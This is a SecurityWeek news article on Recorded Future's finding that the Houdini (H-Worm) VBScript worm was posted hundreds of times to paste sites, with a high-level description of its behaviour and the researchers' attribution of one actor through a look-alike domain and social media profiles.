Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Houdini Worm Gets Posted to Paste Sites

Recorded Future security researchers recently discovered that the Houdini worm has been posted hundreds of times on paste sites over the past several months.

Recorded Future security researchers recently discovered that the Houdini worm has been posted hundreds of times on paste sites over the past several months.

Also known as H-Worm, Houdini has been around since 2013, and was said in 2014 to have been created by Naser Al Mutairi from Kuwait. Later that year, the malware was reportedly used in APT campaigns in the Asia-Pacific region, while last year it was associated with the Moonlight espionage campaign targeting the Middle East.

Earlier this year, after noticing an increase in malicious Visual Basic scripts (VBscript) posted on paste sites, Recorded Future had a closer look into the matter and discovered that most of the scripts were Houdini. Moreover, a single actor was found to be partially responsible for the identified malicious VBscripts posted on said sites.

“The individual(s) reusing this Houdini VBscript are continually updating with new command and control servers,” Recorded Future’s Daniel Hatheway explains in a blog post.

Analysis of the script variants revealed not only that they could connect to the defined command and control (C&C) server, but also that, after establishing connection, the malware would copy itself to a directory and then create a registry key in a startup location to achieve persistence.

Overall, the security researchers discovered a total of 213 posts to paste sites as of April 26. These included 105 unique subdomains, 1 domain, and 190 hashes. Thus, they concluded that some of the posts were exact matches, while others used the same domain but contained other changes within the VBscript.

Further analysis revealed that the domains and subdomains used are from a dynamic DNS provider, and that some of the active malware samples would communicate to at least one of the paste sites, in addition to the host defined in one of the VBscript.

The subdomains registered at a dynamic DNS provider didn’t prove helpful in terms of registration data, but one domain, microsofit[.]net, helped the researchers determine that the individual registering the domain used the name “Mohammed Raad.” The actor also used the email “[email protected]” and set Germany as their country.

Advertisement. Scroll to continue reading.

While the Houdini posts on paste sites were published from guest accounts and couldn’t be tied to a single person, the subdomains associated with the VBscripts appeared to be a play on the name “Mohammed Raad,” thus linking the malware to the microsofit[.]net domain.

“A Google search on “Mohammed Raad” revealed a Facebook profile of an individual who claims to be part of “Anonymous,” from Germany, and uses “Vicswors Baghdad” as an alias. This profile is identical to the registration information from microsofit[.]net,” Hatheway notes.

What’s more, the Facebook profile was found to display a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. Thus, the researcher concluded that the same actor might be studying, testing, and possibly configuring the ransomware.

A closer look at the screenshot posted on the “vicsworsbaghdad” Facebook profile revealed that the ransomware is available by commenting on the creator’s YouTube video. Next, the security researcher discovered that an account “Vicswors Baghdad” commented asking for information about the download.

The account, Hatheway says, uses the same email “[email protected]” as the registration of microsofit[.]net. Moreover, the researcher discovered a profile for “Vicswors Baghdad” on 0day[.]today, but no activity was associated with it.

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Understand how to go beyond effectively communicating new security strategies and recommendations.

Register

Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cybercrime

Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.